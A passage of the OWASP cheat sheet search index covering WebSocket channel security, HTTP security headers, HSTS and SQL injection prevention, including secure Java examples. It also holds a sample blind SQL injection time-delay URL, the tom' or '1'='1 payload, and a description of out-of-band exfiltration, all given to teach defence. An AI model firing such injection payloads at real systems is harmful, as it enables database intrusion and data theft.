->\nv.forEach(s -> messages.add(String.format(\"(%s): %s\", k, s))));\n}\n\n//Build the response object indicating that exchange succeed\nif (AccessTokenBlocklistUtils.MESSAGE_ACCESS_TOKEN_INVALIDATION_FLAG\n.equalsIgnoreCase(message.getContent().trim())) {\nresponse = new MessageResponse(true, messages, \"Token added to the block list\");\n}else{\nresponse = new MessageResponse(true, messages, \"\");\n}\n\n} catch (Exception e) 
{\nLOG.error(\"[MessageHandler] Error occur in exchange process.\", e);\n//Build the response object indicating that exchange fail\n//We send the error detail on client because ware are in POC (it will not the case in a real app)\nresponse = new MessageResponse(false, new ArrayList<>(), \"Error occur during exchange: \"\n+ e.getMessage());\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[MessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n}\n
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#confidentiality-and-integrity","title":"Confidentiality and Integrity","text":"

If the raw version of the protocol is used (protocol ws://) then the transferred data is exposed to eavesdropping and potential on-the-fly alteration.

Example of capture using Wireshark, searching for password exchanges in the stored PCAP file; non-printable characters have been explicitly removed from the command result:

$ grep -aE '(password)' capture.pcap\n{\"login\":\"bob\",\"password\":\"bob123\"}\n

There is a way to check, at WebSocket endpoint level, if the channel is secure by calling the method isSecure() on the session object instance.

Example of implementation in the endpoint method in charge of setting up the session and assigning the message handler:

/**\n * Handle the beginning of an exchange\n *\n * @param session Exchange session information\n */\n@OnOpen\npublic void start(Session session) {\n...\n//Affect a new message handler instance in order to process the exchange only if the channel is secured\nif(session.isSecure()) {\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\n}else{\nLOG.info(\"[AuthenticationEndpoint] Session {} do not use a secure channel so no message handler \" +\n\"was affected for processing and session was explicitly closed !\", session.getId());\ntry{\nsession.close(new CloseReason(CloseReason.CloseCodes.CANNOT_ACCEPT,\"Insecure channel used !\"));\n}catch(IOException e){\nLOG.error(\"[AuthenticationEndpoint] Session {} cannot be explicitly closed !\", session.getId(),\ne);\n}\n\n}\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\", session.getId());\n}\n

Expose WebSocket endpoints only over the wss:// protocol (WebSockets over SSL/TLS) in order to ensure the confidentiality and integrity of the traffic, just as HTTP over SSL/TLS is used to secure HTTP exchanges.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html","title":"HTTP Security Response Headers Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP headers are an easy-to-implement way to strengthen web security. Proper HTTP response headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information disclosure and more.

In this cheat sheet, we will review all security-related HTTP headers, recommended configurations, and reference other sources for complicated headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#security-headers","title":"Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-frame-options","title":"X-Frame-Options","text":"

The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe>, <embed> or <object>. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.

Content Security Policy (CSP) frame-ancestors directive obsoletes X-Frame-Options for supporting browsers (source).

The X-Frame-Options header is only useful when the HTTP response where it is included has something to interact with (e.g. links, buttons). If the HTTP response is a redirect or an API returning JSON data, X-Frame-Options does not provide any security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation","title":"Recommendation","text":"

Use Content Security Policy (CSP) frame-ancestors directive if possible.

Do not allow displaying of the page in a frame.

X-Frame-Options: DENY

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-xss-protection","title":"X-XSS-Protection","text":"

The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome, and Safari that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks.

WARNING: Even though this header can protect users of older web browsers that don't yet support CSP, in some cases this header can create XSS vulnerabilities in otherwise safe websites (source).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_1","title":"Recommendation","text":"

Use a Content Security Policy (CSP) that disables the use of inline JavaScript.

Do not set this header or explicitly turn it off.

X-XSS-Protection: 0

Please see Mozilla X-XSS-Protection for details.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-content-type-options","title":"X-Content-Type-Options","text":"

The X-Content-Type-Options response HTTP header is used by the server to indicate to the browsers that the MIME types advertised in the Content-Type headers should be followed and not guessed.

This header is used to block browsers' MIME type sniffing, which can transform non-executable MIME types into executable MIME types (MIME Confusion Attacks).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_2","title":"Recommendation","text":"

Set the Content-Type header correctly throughout the site.

X-Content-Type-Options: nosniff

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#referrer-policy","title":"Referrer-Policy","text":"

The Referrer-Policy HTTP header controls how much referrer information (sent via the Referer header) should be included with requests.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_3","title":"Recommendation","text":"

Referrer policy has been supported by browsers since 2014. Today, the default behavior in modern browsers is to no longer send all referrer information (origin, path, and query string) to the same site but to only send the origin to other sites. However, since not all users may be using the latest browsers, we suggest forcing this behavior by sending this header in all responses.

Referrer-Policy: strict-origin-when-cross-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-type","title":"Content-Type","text":"

The Content-Type representation header is used to indicate the original media type of the resource (before any content encoding is applied for sending). If not set correctly, the resource (e.g. an image) may be interpreted as HTML, making XSS vulnerabilities possible.

Although it is recommended to always set the Content-Type header correctly, it would constitute a vulnerability only if the content is intended to be rendered by the client and the resource is untrusted (provided or modified by a user).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_4","title":"Recommendation","text":"

Content-Type: text/html; charset=UTF-8

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#set-cookie","title":"Set-Cookie","text":"

The Set-Cookie HTTP response header is used to send a cookie from the server to the user agent, so the user agent can send it back to the server later. To send multiple cookies, multiple Set-Cookie headers should be sent in the same response.

This is not a security header per se, but its security attributes are crucial.
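
For illustration, a session cookie set with the commonly recommended security attributes might look like the following (the cookie name and value are placeholders):

Set-Cookie: SESSIONID=<random value>; Secure; HttpOnly; SameSite=Lax; Path=/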

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_5","title":"Recommendation","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#strict-transport-security-hsts","title":"Strict-Transport-Security (HSTS)","text":"

The HTTP Strict-Transport-Security response header (often abbreviated as HSTS) lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_6","title":"Recommendation","text":"

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

Please check out the HTTP Strict Transport Security Cheat Sheet for more information.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#expect-ct","title":"Expect-CT \u274c","text":"

The Expect-CT header lets sites opt-in to reporting of Certificate Transparency (CT) requirements. Given that mainstream clients now require CT qualification, the only remaining value is reporting such occurrences to the nominated report-uri value in the header. The header is now less about enforcement and more about detection/reporting.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_7","title":"Recommendation","text":"

Do not use it. Mozilla recommends avoiding it, and removing it from existing code if possible.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#content-security-policy-csp","title":"Content-Security-Policy (CSP)","text":"

Content Security Policy (CSP) is a security feature that is used to specify the origin of content that is allowed to be loaded on a website or in a web application. It is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement to distribution of malware.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_8","title":"Recommendation","text":"

Content Security Policy is complex to configure and maintain. For an explanation of the customization options, please read the Content Security Policy Cheat Sheet.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#access-control-allow-origin","title":"Access-Control-Allow-Origin","text":"

If you don't use this header, your site is protected by default by the Same Origin Policy (SOP). What this header does is relax this control in specified circumstances.

The Access-Control-Allow-Origin header is a CORS (cross-origin resource sharing) header. This header indicates whether the response it is related to can be shared with requesting code from the given origin. In other words, if siteA requests a resource from siteB, siteB should indicate in its Access-Control-Allow-Origin header that siteA is allowed to fetch that resource; if not, the access is blocked due to the Same Origin Policy (SOP).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_9","title":"Recommendation","text":"

If you use it, set specific origins instead of *. Check out Access-Control-Allow-Origin for details.

Access-Control-Allow-Origin: https://yoursite.com

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-opener-policy-coop","title":"Cross-Origin-Opener-Policy (COOP)","text":"

The HTTP Cross-Origin-Opener-Policy (COOP) response header allows you to ensure a top-level document does not share a browsing context group with cross-origin documents.

This header works together with Cross-Origin-Embedder-Policy (COEP) and Cross-Origin-Resource-Policy (CORP) explained below.

This mechanism protects against attacks like Spectre which can cross the security boundary established by Same Origin Policy (SOP) for resources in the same browsing context group.

As these headers are closely tied to browsers, they may not make sense for REST APIs or clients that are not browsers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_10","title":"Recommendation","text":"

Isolates the browsing context exclusively to same-origin documents.

Cross-Origin-Opener-Policy: same-origin

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-embedder-policy-coep","title":"Cross-Origin-Embedder-Policy (COEP)","text":"

The HTTP Cross-Origin-Embedder-Policy (COEP) response header prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_11","title":"Recommendation","text":"

A document can only load resources from the same origin, or resources explicitly marked as loadable from another origin.

Cross-Origin-Embedder-Policy: require-corp

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#cross-origin-resource-policy-corp","title":"Cross-Origin-Resource-Policy (CORP)","text":"

The Cross-Origin-Resource-Policy (CORP) header allows you to control the set of origins that are empowered to include a resource. It is a robust defense against attacks like Spectre, as it allows browsers to block a given response before it enters an attacker's process.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_12","title":"Recommendation","text":"

Limit current resource loading to the site and sub-domains only.

Cross-Origin-Resource-Policy: same-site

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#permissions-policy-formerly-feature-policy","title":"Permissions-Policy (formerly Feature-Policy)","text":"

Permissions-Policy allows you to control which origins can use which browser features, both in the top-level page and in embedded frames. For every feature controlled by Feature Policy, the feature is only enabled in the current document or frame if its origin matches the allowed list of origins. This means that you can configure your site to never allow the camera or microphone to be activated. This prevents an injection, for example an XSS, from enabling the camera, the microphone, or other browser features.

More information: Permissions-Policy

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_13","title":"Recommendation","text":"

Set it and disable all the features that your site does not need, or allow them only for the authorized domains:

Permissions-Policy: geolocation=(), camera=(), microphone=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#floc-federated-learning-of-cohorts","title":"FLoC (Federated Learning of Cohorts)","text":"

FLoC is a method proposed by Google in 2021 to deliver interest-based advertisements to groups of users (\"cohorts\"). The Electronic Frontier Foundation, Mozilla, and others believe FLoC does not do enough to protect users' privacy.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_14","title":"Recommendation","text":"

A site can declare that it does not want to be included in the user's list of sites for cohort calculation by sending this HTTP header.

Permissions-Policy: interest-cohort=()

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#server","title":"Server","text":"

The Server header describes the software used by the origin server that handled the request \u2014 that is, the server that generated the response.

This is not a security header, but how it is used is relevant for security.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_15","title":"Recommendation","text":"

Remove this header or set non-informative values.

Server: webserver

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-powered-by","title":"X-Powered-By","text":"

The X-Powered-By header describes the technologies used by the webserver. This information exposes the server to attackers. Using the information in this header, attackers can find vulnerabilities more easily.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_16","title":"Recommendation","text":"

Remove all X-Powered-By headers.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnet-version","title":"X-AspNet-Version","text":"

Provides information about the .NET version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_17","title":"Recommendation","text":"

Disable sending this header. Add the following line in your web.config in the <system.web> section to remove it.

<httpRuntime enableVersionHeader=\"false\" />\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-aspnetmvc-version","title":"X-AspNetMvc-Version","text":"

Provides information about the ASP.NET MVC version.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_18","title":"Recommendation","text":"

Disable sending this header. To remove the X-AspNetMvc-Version header, add the line below to the Global.asax file.

MvcHandler.DisableMvcResponseHeader = true;\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#x-dns-prefetch-control","title":"X-DNS-Prefetch-Control","text":"

The X-DNS-Prefetch-Control HTTP response header controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_19","title":"Recommendation","text":"

The default behavior of browsers is to perform DNS caching, which is good for most websites. If you do not control the links on your website, you might want to set off as the value to disable DNS prefetching and avoid leaking information to those domains.

X-DNS-Prefetch-Control: off

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#public-key-pins-hpkp","title":"Public-Key-Pins (HPKP)","text":"

The HTTP Public-Key-Pins response header is used to associate a specific cryptographic public key with a certain web server to decrease the risk of MITM attacks with forged certificates.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#recommendation_20","title":"Recommendation","text":"

This header is deprecated and should not be used anymore.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#adding-http-headers-in-different-technologies","title":"Adding HTTP Headers in Different Technologies","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#php","title":"PHP","text":"

The sample code below sets the X-Frame-Options header in PHP.

header(\"X-Frame-Options: DENY\");\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#apache","title":"Apache","text":"

Below is an .htaccess sample configuration which sets the X-Frame-Options header in Apache.

<IfModule mod_headers.c>\nHeader set X-Frame-Options \"DENY\"\n</IfModule>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#iis","title":"IIS","text":"

Add the configuration below to your Web.config file in IIS to send the X-Frame-Options header.

<system.webServer>\n...\n <httpProtocol>\n<customHeaders>\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n</customHeaders>\n</httpProtocol>\n...\n</system.webServer>\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#haproxy","title":"HAProxy","text":"

Add the line below to your front-end, listen, or backend configurations to send the X-Frame-Options header.

http-response set-header X-Frame-Options DENY\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#nginx","title":"Nginx","text":"

Below is a sample configuration that sets the X-Frame-Options header in Nginx.

add_header \"X-Frame-Options\" \"DENY\";\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#express","title":"Express","text":"

You can use helmet to set up HTTP headers in Express. The code below is a sample for adding the X-Frame-Options header.

const helmet = require('helmet');\nconst app = express();\n// Sets \"X-Frame-Options: SAMEORIGIN\"\napp.use(\nhelmet.frameguard({\naction: \"sameorigin\",\n})\n);\n
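
For a plain Java Servlet environment, a similar effect can be achieved with a filter. The sketch below is illustrative only: the class name is hypothetical and the header value should match your own policy.

import java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletResponse;\n\n// Illustrative filter that adds the X-Frame-Options header to every response\n// (init() and destroy() have default implementations in recent Servlet API versions)\npublic class FrameOptionsFilter implements Filter {\n@Override\npublic void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)\nthrows IOException, ServletException {\n((HttpServletResponse) response).setHeader(\"X-Frame-Options\", \"DENY\");\nchain.doFilter(request, response);\n}\n}\n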
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#testing-proper-implementation-of-security-headers","title":"Testing Proper Implementation of Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#mozilla-observatory","title":"Mozilla Observatory","text":"

The Mozilla Observatory is an online tool which helps you to check your website's header status.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#smartscanner","title":"SmartScanner","text":"

SmartScanner has a dedicated test profile for testing security of HTTP headers. Online tools usually test the homepage of the given address. But SmartScanner scans the whole website. So, you can make sure all of your web pages have the right HTTP Headers in place.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html","title":"HTTP Strict Transport Security Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Strict Transport Security (also named HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click-through prompts on browsers.

The specification was released and published at the end of 2012 as RFC 6797 (HTTP Strict Transport Security (HSTS)) by the IETF.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#threats","title":"Threats","text":"

HSTS addresses the following threats:

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#examples","title":"Examples","text":"

Simple example, using a long (1 year = 31536000 seconds) max-age. This example is dangerous since it lacks includeSubDomains:

Strict-Transport-Security: max-age=31536000

This example is useful if all present and future subdomains will be HTTPS. This is a more secure option but will block access to certain pages that can only be served over HTTP:

Strict-Transport-Security: max-age=31536000; includeSubDomains

This example is useful if all present and future subdomains will be HTTPS. In this example we set a very short max-age in case of mistakes during initial rollout:

Strict-Transport-Security: max-age=86400; includeSubDomains

Recommended:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

The preload flag indicates the site owner's consent to have their domain preloaded. The site owner still needs to then go and submit the domain to the list.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#problems","title":"Problems","text":"

Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look here for more details.

Cookies can be manipulated from sub-domains, so omitting the includeSubDomains option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring the secure flag is set on all cookies will also prevent some, but not all, of the same attacks.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

As of September 2019 HSTS is supported by all modern browsers, with the only notable exception being Opera Mini.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html","title":"Infrastructure as Code Security","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#infrastructure-as-code-security-cheatsheet","title":"Infrastructure as Code Security Cheatsheet","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Infrastructure as code (IaC), also known as software-defined infrastructure, allows infrastructure components to be configured and deployed faster and more consistently by defining them as code, and also enables repeatable deployments across environments.

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#security-best-practices","title":"Security best practices","text":"

Here are some of the security best practices for IaC that can be easily integrated into the Software Development Lifecycle:

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#develop-and-distribute","title":"Develop and Distribute","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#deploy","title":"Deploy","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#runtime","title":"Runtime","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing the entire category of Injection flaws in your applications. Injection attacks, especially SQL Injection, are unfortunately very common.

Application accessibility is a very important factor in the protection and prevention of injection flaws. Only a minority of all applications within a company/enterprise are developed in house, whereas most applications come from external sources. Open source applications give at least the opportunity to fix problems, but closed source applications need a different approach to injection flaws.

Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Depending on the accessibility, different actions must be taken in order to fix them. The best approach is always to fix the problem in the source code itself, or even to redesign some parts of the application. But if the source code is not available, or it is simply uneconomical to fix legacy software, only virtual patching makes sense.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#application-types","title":"Application Types","text":"

Three classes of applications can usually be seen within a company. These three types are needed to identify the actions which need to take place in order to prevent/fix injection flaws.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a1-new-application","title":"A1: New Application","text":"

A new web application in the design phase, or in early stage development.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a2-productive-open-source-application","title":"A2: Productive Open Source Application","text":"

An already productive application, which can be easily adapted. A Model-View-Controller (MVC) type application is just one example of an easily accessible application architecture.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a3-productive-closed-source-application","title":"A3: Productive Closed Source Application","text":"

A productive application which cannot be modified, or only with difficulty.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#forms-of-injection","title":"Forms of Injection","text":"

There are several forms of injection targeting different technologies including SQL queries, LDAP queries, XPath queries and OS commands.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#query-languages","title":"Query languages","text":"

The most famous form of injection is SQL Injection where an attacker can modify existing database queries. For more information see the SQL Injection Prevention Cheat Sheet.

LDAP, SOAP, XPath and REST-based queries can also be susceptible to injection attacks allowing for data retrieval or control bypass.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

An SQL injection attack consists of insertion or \"injection\" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.

A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

SQL Injection attacks can be divided into the following three classes:

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review","title":"During code review","text":"

Please check whether any queries to the database are not done via prepared statements.

If dynamic statements are being made, please check whether the data is sanitized before being used as part of the statement.

Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation","title":"Automated Exploitation","text":"

Most of the situations and techniques presented below can be performed in an automated way using some tools. In this article the tester can find information on how to perform automated auditing using SQLMap.

Equally, Static Code Analysis data-flow rules can detect whether unsanitized user-controlled input can change the SQL query.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#stored-procedure-injection","title":"Stored Procedure Injection","text":"

When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#time-delay-exploitation-technique","title":"Time delay Exploitation technique","text":"

The time delay exploitation technique is very useful when the tester finds a Blind SQL Injection situation, in which nothing is known about the outcome of an operation. This technique consists of sending an injected query and, if the conditional is true, the tester can monitor the time taken for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can differ from DBMS to DBMS (check the DBMS-specific section).

http://www.example.com/product.php?id=10 AND IF(version() like '5%', sleep(10), 'false'))--\n

In this example the tester is checking whether the MySQL version is 5.x or not, making the server delay the answer by 10 seconds. The tester can increase the delay time and monitor the responses. The tester also doesn't need to wait for the response: sometimes they can set a very high value (e.g. 100) and cancel the request after a few seconds.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#out-of-band-exploitation-technique","title":"Out of band Exploitation technique","text":"

This technique is very useful when the tester finds a Blind SQL Injection situation, in which nothing is known about the outcome of an operation. The technique consists of using DBMS functions to perform an out-of-band connection and deliver the results of the injected query as part of a request to the tester's server. Like the error-based techniques, each DBMS has its own functions. Check the DBMS-specific section.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application.

Both of these techniques have the same effectiveness in preventing SQL injection so your organization should choose which approach makes the most sense for you. Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely* which is the norm for most stored procedure languages.

Note: 'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-List Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used to select different table names and column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query, as shown in the sketch below. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.
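
As an illustrative sketch (the method and column names are hypothetical), such a mapping could look like this, so that only values defined in the code ever reach the query:

// Illustrative sketch: map a user-supplied sort field to a known-good column name\npublic String sortColumnFromParameter(String userValue) {\nswitch (userValue) {\ncase \"lastName\":\nreturn \"last_name\"; // value defined in code, never the raw user input\ncase \"accountBalance\":\nreturn \"account_balance\";\ndefault:\nthrow new IllegalArgumentException(\"Unexpected sort field\");\n}\n}\n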

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injection in all situations.

This technique is to escape user input before putting it in a query. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-prepared-statement-example","title":"Safe Java Prepared Statement Example","text":"

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

// This should REALLY be validated too\nString custname = request.getParameter(\"customerName\");\n// Perform input validation to detect attacks\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\nPreparedStatement pstmt = connection.prepareStatement(query);\npstmt.setString(1, custname);\nResultSet results = pstmt.executeQuery();\n

We have shown examples in Java, but practically all other languages, including Cold Fusion and Classic ASP, support parameterized query interfaces.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-stored-procedure-example","title":"Safe Java Stored Procedure Example","text":"

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

// This should REALLY be validated\nString custname = request.getParameter(\"customerName\");\ntry {\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet results = cs.executeQuery();\n// Result set handling...\n} catch (SQLException se) {\n// Logging and error handling...\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection","title":"LDAP Injection","text":"

